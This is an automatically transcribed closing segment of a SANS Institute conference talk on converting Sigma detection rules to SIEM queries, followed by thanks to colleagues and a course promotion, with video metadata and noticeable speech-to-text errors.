run sigmak to see what what outputs are supported and you have a list right here so arcsight kibana elastic gray log grep net witnessed PowerShell queue radar Qualis blanc etc so let's do the Splunk version of that splink splink pretty simple or the arcsight version you get the idea right back and while we're here let's look at the actual file so here's the actual rule itself and so it's using a system on eventid 11 target net filename temp debug dubbed in so that piece of malware creates that file and there you go alright cool stuff all right I want to give a shout out to uh John Hubbard hiace he helped with the Sigma stuff because it was newer to me and I was talking to him and Justin Henderson I'm like hey I got a system on talk I want to add some to some new sexy and John's like oh I had the new sexy right John wrote a blue team fundamentals course is over at shout out to my friend John Blue team fundamentals was born out of 511 so 511 we had MSSP since and their employees through 511 and some of them got slaughtered because they were 19 years old you know or 23 years old right we see this you know and we didn't like they didn't know what a packet was they didn't know what ping was and their their monitor events 24/7 365 with the team of highly trained analyst this is not all msps this is some MS fees I'm sorry I'm sorry and and so they did and the MSP is trying to train them up which is great you know and they took 511 they didn't know us I didn't it would UDP in and they were just killed its we even need for onboarding people who are newer to this right how do we bring that person in I was a clueless newborns myself how do we do that you know how do we on board people in the finishing the way it stands was 301 floor 1 501 that's a lot of time and a lot of investment and when you want a narrower skillset right and so John the debate is running as you see there in Crystal City the beta is the initial runs it's basically half price so go to class tech 450 comm you have some more junior folks and thanks folks I'll hand around for any questions and thank you thank you you

Info

Channel: SANS Institute

Views: 28,035

Rating: 4.9603958 out of 5

Keywords: sans institute, information security, cyber security, cybersecurity, information security training, cybersecurity training, cyber security training, sans summits, sans conferences, blue team

Id: 7dEfKn70HCI

Channel Id: undefined

Length: 51min 0sec (3060 seconds)

Published: Mon Jul 22 2019